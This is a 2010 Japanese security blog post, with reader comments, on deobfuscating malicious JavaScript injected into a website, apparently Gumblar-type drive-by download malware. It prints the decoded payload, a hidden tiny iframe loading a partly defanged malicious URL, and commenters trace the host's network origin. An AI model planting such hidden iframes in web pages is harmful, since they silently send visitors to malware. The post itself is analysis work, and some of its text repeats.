暇つぶし ― 2010/02/03 20:42
2010.02.03 恵方巻 - UnderForge of Lack
日本だと無報酬で連絡しても、荒らしだとか脅迫だとか営業妨害だとか言われて叩かれるんだぜ!
いや、頼まれてないのに連絡するからか?……
で、元を難読化解除してみたら、さらに難読化されたコードが……なんじゃこりゃ
最終的に出てきたのは
さて、これはシマンテック的にガンブラーと分類するべきかなぁ?w
な・・なんじゃこりゃ
URGENT! Help needed w/ Virus
また新しいタイプですね・・・
デコードする時間がなかったのでこのまま・・
We need immediate help fixing the problem. We are willing to pay for freelance work.
日本だと無報酬で連絡しても、荒らしだとか脅迫だとか営業妨害だとか言われて叩かれるんだぜ!
いや、頼まれてないのに連絡するからか?……
で、元を難読化解除してみたら、さらに難読化されたコードが……なんじゃこりゃ
最終的に出てきたのは
<iframe height=2 border=0 src='http://4ura●us/in.cgi?6' width=4 frameborder=0></iframe>
正月のアレの仲間か?……さて、これはシマンテック的にガンブラーと分類するべきかなぁ?w
コメント
_ G`nome ― 2010/02/03 21:26
_ puppet ― 2010/02/03 22:07
G`nome様、こちらこそいつもお世話になっています。m(_ _)m
JavaScriptもよう知らんのが、alert()使ってFxのエラーコンソールでデコードしてますので、
いつか地雷を踏みそうです。(爆)
JavaScriptもよう知らんのが、alert()使ってFxのエラーコンソールでデコードしてますので、
いつか地雷を踏みそうです。(爆)
_ G`nome ― 2010/02/03 22:56
そうそう、忘れていましたが、Symantecだけでなく、IPAも、「ガンブラー」 = 「drive by download 手法の別称」という定義をしてくださいました(苦笑)
これで益々、"Gumblar"の本質がボヤけてしまうのは必至でしょう。
ttp://www.ipa.go.jp/about/press/20100203.html
なんか、皮肉としか思えない so-netさんの記事:
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2142
これで益々、"Gumblar"の本質がボヤけてしまうのは必至でしょう。
ttp://www.ipa.go.jp/about/press/20100203.html
なんか、皮肉としか思えない so-netさんの記事:
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2142
_ puppet ― 2010/02/03 23:35
※メールアドレスとURLの入力は必須ではありません。 入力されたメールアドレスは記事に反映されず、ブログの管理者のみが参照できます。
※投稿には管理者が設定した質問に答える必要があります。
トラックバック
このエントリのトラックバックURL: http://puppet.asablo.jp/blog/2010/02/03/4854630/tb
※なお、送られたトラックバックはブログの管理者が確認するまで公開されません。
最近はデコードのいいサイトがなくて、解析に失敗したら放置しています(笑)
4ura.us as AS45420 (PIRADIUS-AS) というのが判ると、糸をたどっていくと、系統的に 3ワード.cn (yourbesthosting。cnとか)の流れ(JUNIK型 zlkon)になるのかな~とか想像していますが、(もちろん)確証はありません。
なんかバタバタしてしまってごめんなさい。とりあえず、落ち着いてきたようなので、今後も宜しくお願いします(苦笑)
G`nome